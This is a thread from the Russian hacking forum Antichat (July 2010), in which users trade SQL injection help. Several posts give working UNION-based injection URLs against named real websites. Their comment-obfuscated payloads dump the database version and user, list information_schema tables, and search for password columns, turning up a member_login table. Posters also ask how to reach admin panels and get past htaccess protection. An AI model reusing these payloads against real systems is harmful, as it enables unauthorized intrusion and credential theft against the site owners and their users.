ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.07.2010, 02:11
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Сообщение от The matrix
The matrix said:
Разумеется один из методов.
Ты предпочитаешь использовать не оптимальные и медленные способы? Чем оптимальные и быстрые, которые хотят видеть просящие помочь? 0_о
Это все равно, что пить воду с помощью вилки(медленно, но все же один из способов).
..............
Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным.
И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...
|
|
|
16.07.2010, 06:27
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от auth_root
auth_root said:
Полностью поддерживаю. Оптимально. Не мог бы ты ткнуть на статейку по приведенному тобой методу. Т.к. мне во многих местах непонятно что к чему, какие запросы что выполняют и для чего =) Я первый раз сталкиваюсь с подобным.
И все равно как получить имена таблиц и колумнов не понял =) А это главный вопрос, и просьба...
/thread119047.html
/thread19844.html
|
|
|
|
16.07.2010, 11:53
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от Byrger
Byrger said:
Привет
Есть SQL инъекция
Код:
Code:
site.ru/index.php&name=1'
Поле name уязвимо
Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0
Известно что база MS SQL
Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL
Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе
|
|
|
|
16.07.2010, 12:00
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
добрый день!
Почему второй запрос появляется ошибка?
http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/*/+--+
-->5.1.47
http://www.filarmonika.com/book-description.php?pid=-3+/*!Union+SELECT+1,2,3,version(),5,6,7,8,9/**/%20fRom/
**/information_schema.tables/**/wheRe/**/tAble_schema=dataBase()*/+--+
--> error 403
|
|
|
|
16.07.2010, 12:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
скорее всего просто доступа к informatio_schema нет
|
|
|
|
16.07.2010, 13:49
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
haito
Код:
Code:
http://www.filarmonika.com/book-description.php?pid=3+and+1=2+/*!union*/+select+1,2,3,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),5,6,7,8,9+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
таблица:abriledi_filarmonika:member_login
PS:admin-panel там под hataccessom, просто под юзером логинеться смысла нет ( там даже uploada нет, так что скуль гиблая, люди кто знает способы обхода хтаццесса подскажите )
Seravin
Не стоит вводить людей в заблуждение )
|
|
|
|
16.07.2010, 21:58
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 10
Провел на форуме:
72528
Репутация:
1
|
|
всем привет!
вот скуля:
Код:
Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+
админка:
Код:
Code:
_http://www.fcdinamokirov.ru/admin.php
как зайти в админку с помощью скуля?возможно ли? |
|
|
|
16.07.2010, 22:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от boberko
boberko said:
всем привет!
вот скуля:
Код:
Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+
админка:
Код:
Code:
_http://www.fcdinamokirov.ru/admin.php
как зайти в админку с помощью скуля?возможно ли? иди лучше и подумай что ты будешь писать в сочинение "Как я провел лето", вопрос тупее некуда... даже нубом обозвать тебя и то будет похвалой.. тебе бейсик авторизация говорит о чем нибудь?
|
|
|
|
16.07.2010, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
27923
Репутация:
17
|
|
упой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
|
|
|
|
16.07.2010, 22:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Yetisports
Yetisports said:
упой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
все зависит от скули...это как способ защиты..большинство помимо редиректа и другой арсенал используют для защиты...но попытка не пытка, бывало что канало лишь подзапросами...а бывало что и нормально работал запрос...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2253373){kind=avatar}
Похожие темы
Линейный вид
